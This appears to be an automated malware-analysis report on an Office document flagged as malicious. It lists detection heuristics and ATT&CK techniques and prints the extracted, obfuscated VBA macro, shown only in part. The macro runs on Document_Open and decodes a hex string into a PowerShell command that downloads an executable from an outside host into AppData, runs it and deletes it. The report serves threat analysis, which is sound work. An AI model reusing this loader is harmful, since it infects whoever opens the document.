MALICIOUS
304
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a heavily obfuscated VBA macro with an auto-execute function (Document_Open). This macro uses CreateObject to instantiate a WScript.Shell object and then executes a PowerShell command. The PowerShell command is constructed to download a file from 'http://examon.info/franky/INV-00007' using a .NET WebClient. This indicates the document is a downloader for a second-stage payload.
Heuristics 9
-
ClamAV: Doc.Malware.Valyria-6748978-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6748978-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBA
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46549 bytes |
SHA-256: a5578dc75e9c6d8d042bf141d06d550b11c8feec46a27ac7efb77960a46727a6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const P21sw4avsuMlOEOZFVe As String = "0x"
Const P22sw4avsuMlOEOZFVe As String = "&h"
Public Function P23sw4avsuMlOEOZFVe(ByVal sw4avsuMlOEOZFVe As String, Optional ByVal JlNQNaDDEHC6QgLa As String = P21sw4avsuMlOEOZFVe) As Variant
P23sw4avsuMlOEOZFVe = CVErr(xlErrValue)
For i = 0 To 17: IIf 4 = 5, a = 5, False: Next i
If Left$(sw4avsuMlOEOZFVe, Len(JlNQNaDDEHC6QgLa)) = JlNQNaDDEHC6QgLa Then
Dim IK6KBRxtLJ87bQiq As String
IK6KBRxtLJ87bQiq = Right$(sw4avsuMlOEOZFVe, Len(sw4avsuMlOEOZFVe) - Len(JlNQNaDDEHC6QgLa))
If Len(IK6KBRxtLJ87bQiq) Mod 2 = 0 Then
Dim Bq9OHXgw2BHYZx5f As Integer
For i = 0 To 17: IIf 4 = 5, a = 5, False: Next i
Bq9OHXgw2BHYZx5f = Len(IK6KBRxtLJ87bQiq) / 2
Dim dE7qJmN8XvfebGBW As String
Dim umABg9E1EKQ9kIDo As Integer
For umABg9E1EKQ9kIDo = 1 To Bq9OHXgw2BHYZx5f
dE7qJmN8XvfebGBW = dE7qJmN8XvfebGBW & Chr(Val(P22sw4avsuMlOEOZFVe & Mid$(IK6KBRxtLJ87bQiq, (umABg9E1EKQ9kIDo * 2) - 1, 2)))
Next umABg9E1EKQ9kIDo
P23sw4avsuMlOEOZFVe = dE7qJmN8XvfebGBW
End If
End If
P23sw4avsuMlOEOZFVe = Replace(P23sw4avsuMlOEOZFVe, "cmd /c ", "")
End Function
Private Sub G33IT2QvOaXlRbux()
On Error GoTo aUBN6F8e9fV8FNYp
CreateObject(P23sw4avsuMlOEOZFVe("0x575363726970742E5368656C6C")).Run P23sw4avsuMlOEOZFVe("0x636D6420202F6320706F7765727368656C6C202D6E6F70202D7720312020286E65772D6F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F6578616D6F6E2E696E666F2F6672616E6B792F494E562D3030303037363748472E657865272C2024656E763A417070446174612B272F6E74397A685A7268355A4A4E68525A372E65786527293B73746172742D70726F636573732024656E763A41707044617461272F6E74397A685A7268355A4A4E68525A372E657865273B72692024656E763A41707044617461272F6E74397A685A7268355A4A4E68525A372E65786527"), 0
cleanExit:
Exit Sub
aUBN6F8e9fV8FNYp:
If Err = 3004 Then
Resume Next
Else
Resume cleanExit
End If
End Sub
Private Sub Document_Open()
G33IT2QvOaXlRbux
End Sub
Private Sub LdgAJrENkJrgZZ8e()
vgf2V5ldcYn1g9Fn = "e8HrQOhy2aiVDWKG"
ex0YjdsW2cyUdMIk = "cda0tRxX8QaUXzLq"
mRVTiQecPTyNnwvp = "y7SAVSmy9dZDdI8D"
whGw0Xcx88kJtSKM = "sUr0QlFFFxTf0L9i"
M4ng08yO4vBXJNfq = "ynhsqiWqMa1Ee7Gx"
YcXyGEWxwM5vUR61 = "oEOMEQ1Mh6DZg4L7"
PdXGZQT9BT6NnCG5 = "damKv23tllqKa7qC"
b7GR3BbLTMmUTnzP = "wIUgRaM5kFvNAk8E"
yFMp6YcM8O0SQiJ7 = "NLiDmkTavKHyfykK"
HSspLkTMGhigk3pb = "Vx1ZcGstVO3wrNIK"
xqe70uxO0F7ecMZC = "rGCSHuHiB9D8rxw2"
EIO3YrlOap8HJoqj = "NCbUlZdhT6H10yvE"
hfEF76Mdv0Rrw9Kn = "LunYwLQUEIk2UtVM"
UFzDTVlZZ8AuhVVT = "tuiGlGhIySaAVUsb"
efx0LgD6jx9xlxNS = "NBFAlpByx0fbVUde"
Jzpcy4ir1mxXHUwb = "esNvp200N9DTaBly"
q4RVhLu1soI81N0M = "ze6EhSZWJzzyByqB"
b8FOcL3E7Vdau189 = "h0p6EQrLf4nSm5A3"
Xh73joK3kDGvPYDQ = "wzpLjt6uQ4Hixlrc"
skcn4e04qwVbl65q = "xGsXPZUOkMnoRCG9"
jD8GWpWwIvvWI5iT = "YrQ12EwHzxcr1OnY"
QVZR7zDmT6pvE7hp = "zDpAUOhQhCgzmFE5"
gG7VfAWKXEh6pacC = "nWXzwWdkOjLFte9p"
xtn7avkdQPOqIkCg = "wOizQfJvCWg6ZrqT"
z1E5XeB5MTSQkXMF = "JFfO5LIxT1Gopooz"
v1VPPHswnnW7w2lO = "hOpumLY4ugl6JnQz"
Atqtc7YkmSBRXKb1 = "J0eM83nYd1wJvvXa"
CCKMvynkbfuYjMDB = "KyEQUORtGDgjpeck"
gwV5hZQ4ylRDx9QT = "DwLKdgt6Trh2rd56"
cjQW1Iu2RKsK3p5G = "NwL3DDhadYlZRXNv"
nVAos32abR1EYScF = "sLg4CbDLcPTdxEk4"
V7uiYRo2EK1ULNmu = "NPEhRS2osZmMkYNH"
C7I1z4QNxnA1kS9y = "yzrRadmneg09GLSP"
WunNgv529ZUEtbdK = "QXiUI5HEUvWtdRiV"
zU50FwsiEySltS3d = "briSC7haXT2VIOYr"
K89IgnfEFaqjnvlc = "wTrVJAtHN4cUDHL2"
DBFuSv7YmOnCR7XD = "C0uYvcSrPD4llub8"
End Sub
Private Sub vyKWZ1tfWCK4m0ZP()
fKmOmWHHRnNqBVN2 = "GpdtyaMQHpb3DYeZ"
HoeLhAVM1cfMndNa = "PRr7XGsg6Ff6UNe2"
hYMmQcUnDBCv5aEE = "FafVHhbh68NMuZ1n"
XmDyACuV7eFxd7l6 = "bLvTJtvcWFqSyi2N"
DpwSHfdjQtXDOOe8 = "ORLTEhOP0BL5lOxY"
k1XYLCA5ImdpF2Ai = "wr5QHjjBKQ1fEi7f"
V9rU1qyvrOmsezl8 = "bDE4PQsdR
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.